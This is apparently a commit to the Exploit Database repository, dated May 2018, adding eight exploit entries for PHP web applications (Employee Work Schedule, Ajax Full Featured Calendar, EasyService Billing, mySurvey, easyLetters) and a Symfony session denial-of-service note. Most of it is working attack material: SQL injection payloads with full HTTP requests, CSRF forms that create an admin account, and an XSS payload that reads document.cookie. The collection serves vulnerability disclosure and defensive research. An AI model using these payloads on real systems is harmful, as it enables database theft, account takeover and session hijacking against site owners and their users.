DB: 2018-05-27

8 changes to exploits/shellcodes Symfony 2.7.0 < 4.0.10 - Denial of Service Employee Work Schedule 5.9 - 'cal_id' SQL Injection Ajax Full Featured Calendar 2.0 - 'search' SQL Injection EasyService Billing 1.0 - Cross-Site Request Forgery EasyService Billing 1.0 - Cross-Site Scripting EasyService Billing 1.0 - 'q' SQL Injection mySurvey 1.0 - 'id' SQL Injection easyLetters 1.0 - 'id' SQL Injection
2018-05-27 05:01:47 +00:00 · 2018-05-27 05:01:47 +00:00 · 6ba5b68c67
commit 6ba5b68c67
parent 608176a851
9 changed files with 330 additions and 0 deletions
--- a/exploits/php/dos/44768.txt
+++ b/exploits/php/dos/44768.txt
@ -0,0 +1,12 @@
+The PDOSessionHandler class allows to store sessions on a PDO connection. Under some configurations (see below) and with a well-crafted payload, it was possible to do a denial of service on a Symfony application without too much resources.
+
+An application is vulnerable when:
+
+- It is using PDOSessionHandler to store its sessions;
+
+- And it uses MySQL as a backend for sessions managed by PDOSessionHandler;
+
+- And the SQL mode does not contain STRICT_ALL_TABLES or STRICT_TRANS_TABLES (check via SELECT @@sql_mode).
+
+POC:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44768.tgz
--- a/exploits/php/webapps/44761.txt
+++ b/exploits/php/webapps/44761.txt
@ -0,0 +1,43 @@
+# Exploit Title: EWS 5.9 - 'search' SQL Injection
+# Dork: N/A
+# Date: 25.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://codecanyon.net/item/employee-work-schedule-multicalendar/10545683
+# Version: 5.9
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The vulnerability allows an attacker to inject sql commands
+from the search section with 'cal_id' parameter.
+====================================================
+# Demo : http://paulthedutchman.nl/ews/
+# PoC : SQLi :
+
+http://test.com/ews/?action=search
+
+POST /ews/?action=search HTTP/1.1
+Host: test.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://test.com/ews/
+Cookie: PHPSESSID=pss9q96b0v9ja9m35hc8s2hod4
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 34
+sq=test&cal_id=11%2C90%2C199%2C208
+
+
+Parameter: cal_id (POST)
+
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: sq=test&cal_id=11,90,199,208) AND 4528=4528 AND (1723=1723
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: sq=test&cal_id=11,90,199,208) AND SLEEP(5) AND (8958=8958
+
+
+====================================================
--- a/exploits/php/webapps/44762.txt
+++ b/exploits/php/webapps/44762.txt
@ -0,0 +1,36 @@
+# Exploit Title: Ajax Full Featured Calendar 2.0 - 'search' SQL Injection
+# Dork: N/A
+# Date: 25.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://codecanyon.net/item/ajax-full-featured-calendar-2/10158465
+# Version: 2.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : The vulnerability allows an attacker to inject sql commands from the search section with 'search' parameter.
+====================================================
+# Demo : http://pauloreg.com/d/affc2/index.php
+# PoC : SQLi :
+
+POST /d/affc2/includes/loader.php HTTP/1.1
+Host: test.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://test.com/d/affc2/index.php
+Content-Length: 11
+Cookie: PHPSESSID=pt848bokjvads6c9kvgs1nu973
+Connection: keep-alive
+search=test
+
+Parameter: search (POST)
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: search=test%' AND SLEEP(5) AND '%'='
+
+
+====================================================
--- a/exploits/php/webapps/44763.html
+++ b/exploits/php/webapps/44763.html
@ -0,0 +1,87 @@
+<!--
+# Exploit Title: EasyService Billing 1.0 Multiple Cross-Site Request Forgery
+# Date: 25-05-2018
+# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 
+# Exploit Author: Divya Jain
+# Version: EasyService Billing 1.0 
+# CVE: CVE-2018-11445,CVE-2018-11442
+# Category: Webapps
+# Severity: Medium
+# Tested on: KaLi LinuX_x64
+# # # # # # # #
+#
+# Proof of Concept:
+           //////////////////////////
+          / CSRF in Quotation Page /
+         //////////////////////////
+# Initial Request:
+
+POST /EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 HTTP/1.1
+Host: test.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139
+Cookie: tntcon=5078855aa89b90f68de5644f75495364a4xn; PHPSESSID=58bf7e8rf0jpiepg3iu7larrj2
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 86
+
+quotation_id=139&quotation_no=249&des=test&button=Save&MM_update=form1&MM_insert=form1
+
+# CSRF POC:
+
+<html>
+ <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139" method="POST">
+      <input type="hidden" name="quotation&#95;id" value="139" />
+      <input type="hidden" name="quotation&#95;no" value="249" />
+      <input type="hidden" name="des" value="testnew" />
+      <input type="hidden" name="button" value="Save" />
+      <input type="hidden" name="MM&#95;update" value="form1" />
+      <input type="hidden" name="MM&#95;insert" value="form1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+           ///////////////////////////
+          // CSRF in User Add Page //
+         ///////////////////////////
+         
+# Initial Request
+
+POST /EasyServiceBilling/system-settings-user-new2.php? HTTP/1.1
+Host: test.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://test.com/EasyServiceBilling/system-settings-user-new2.php
+Cookie: tntcon=ea1c7cc27fc02e6abf755d54fa60a8a8a4xn; PHPSESSID=kao38vbne4c4s9s0587o8h99e6
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+
+type=Admin&un=a&pw=b&MM_insert=form1
+         
+# CSRF POC
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://test.com/EasyServiceBilling/system-settings-user-new2.php?" method="POST">
+      <input type="hidden" name="type" value="Admin" />
+      <input type="hidden" name="un" value="adminTest" />
+      <input type="hidden" name="pw" value="adminTest" />
+      <input type="hidden" name="MM&#95;insert" value="form1" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+         
+-->
--- a/exploits/php/webapps/44764.txt
+++ b/exploits/php/webapps/44764.txt
@ -0,0 +1,24 @@
+<!--
+# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter
+# Date: 25-05-2018
+# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 
+# Exploit Author: Divya Jain
+# Version: EasyService Billing 1.0 
+# CVE: CVE-2018-11443
+# Category: Webapps
+# Severity: Medium
+# Tested on: KaLi LinuX_x64
+# # # # #
+# 
+# Proof of Concept:
+#
+            ///////////
+           //  XSS  //
+          ///////////
+ 
+ Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=
+ Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27
+ Parameter: q
+ Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27
+ 
+ ###########################################################################
--- a/exploits/php/webapps/44765.txt
+++ b/exploits/php/webapps/44765.txt
@ -0,0 +1,27 @@
+<!--
+# Exploit Title: EasyService Billing 1.0 SQL Injection on page jobcard-ongoing.php?q=
+# Date: 25-05-2018
+# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 
+# Exploit Author: Divya Jain
+# Version: EasyService Billing 1.0 
+# CVE: CVE-2018-11444
+# Category: Webapps
+# Severity: High
+# Tested on: KaLi LinuX_x64
+# # # # # # # #
+#
+
+# Proof of Concept:
+        ////////////////////////////////
+          SQL Injection in q parameter
+        ///////////////////////////////
+    Affected Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=
+# Boolean Based Blind SQL
+Payload: 1337'OR%20NOT 1=1--
+Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'OR%20NOT 1=1--
+
+# Error-Based SQL
+Payload: 1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD
+
+Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD
+#################################
--- a/exploits/php/webapps/44766.txt
+++ b/exploits/php/webapps/44766.txt
@ -0,0 +1,72 @@
+# Exploit Title: mySurvey 1.0 - 'statistic.php' SQL Injection
+# Dork: N/A
+# Date: 25.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://codecanyon.net/item/mysurvey/6794645
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : You can see the notifications on the left side when you
+receive new answers.
+This url works in 'statistic.php' with 'id' parameter. This 'id' parameter
+is vulnerable.
+====================================================
+
+# PoC : SQLi :
+
+http://test.com/mySurvey/statistic.php?id=[SQLi]
+
+Parameter: id (GET)
+
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=31 AND 5291=5291
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: id=31 AND SLEEP(5)
+
+# /question.php Parameter: id (GET)
+
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=2 AND 2740=2740
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: id=2 AND SLEEP(5)
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 5 columns
+    Payload: id=2 UNION ALL SELECT
+NULL,NULL,CONCAT(0x716a787171,0x756d496841646d646a62785a6b7651775a4946456a465142654251536d4b4952646a58564e736166,0x716a627a71),NULL,NULL--
+SggH
+
+
+# /edit_live.php Parameter: id (GET)
+
+    Type: boolean-based blind
+    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
+    Payload: id=(SELECT (CASE WHEN (4199=4199) THEN 4199 ELSE 4199*(SELECT
+4199 FROM INFORMATION_SCHEMA.PLUGINS) END))
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 3 columns
+    Payload: id=-6620 UNION ALL SELECT
+CONCAT(0x716a6b6b71,0x706169774d7955627455656966494d4a78775a6d6e63504f7342426d5266497556767a57636e636e,0x7170786a71),NULL,NULL--
+tDPV
+
+
+
+# /statistic.php Parameter: id (GET)
+
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: id=31 AND 5291=5291
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: id=31 AND SLEEP(5)
+
+
+====================================================
--- a/exploits/php/webapps/44767.txt
+++ b/exploits/php/webapps/44767.txt
@ -0,0 +1,21 @@
+# Exploit Title: easyLetters 1.0 - 'id' SQL Injection
+# Dork: N/A
+# Date: 25.05.2018
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor Homepage: https://codecanyon.net/item/easyletters/5281396
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+====================================================
+# Demo : http://pauloreg.com/newsletter/
+# PoC : SQLi :
+
+http://test.com/newsletter/e-mails.php?id=[SQLi]
+
+Parameter: id (GET)
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: id=1 AND SLEEP(5)
+
+====================================================
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5982,6 +5982,7 @@ id,file,description,date,author,type,platform,port
 44724,exploits/android/dos/44724.txt,"Samsung Galaxy S7 Edge - Overflow in OMACP WbXml String Extension Processing",2018-05-23,"Google Security Research",dos,android,
 44758,exploits/windows/dos/44758.html,"Microsoft Edge Chakra - Cross Context Use-After-Free",2018-05-25,"Google Security Research",dos,windows,
 44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
+44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -39432,3 +39433,10 @@ id,file,description,date,author,type,platform,port
 44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php,
 44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux,
 44751,exploits/linux/webapps/44751.txt,"EU MRV Regulatory Complete Solution 1 - Authentication Bypass",2018-05-24,Veyselxan,webapps,linux,
+44761,exploits/php/webapps/44761.txt,"Employee Work Schedule 5.9 - 'cal_id' SQL Injection",2018-05-26,AkkuS,webapps,php,
+44762,exploits/php/webapps/44762.txt,"Ajax Full Featured Calendar 2.0 - 'search' SQL Injection",2018-05-26,AkkuS,webapps,php,
+44763,exploits/php/webapps/44763.html,"EasyService Billing 1.0 - Cross-Site Request Forgery",2018-05-26,"Divya Jain",webapps,php,
+44764,exploits/php/webapps/44764.txt,"EasyService Billing 1.0 - Cross-Site Scripting",2018-05-26,"Divya Jain",webapps,php,
+44765,exploits/php/webapps/44765.txt,"EasyService Billing 1.0 - 'q' SQL Injection",2018-05-26,"Divya Jain",webapps,php,
+44766,exploits/php/webapps/44766.txt,"mySurvey 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php,
+44767,exploits/php/webapps/44767.txt,"easyLetters 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php,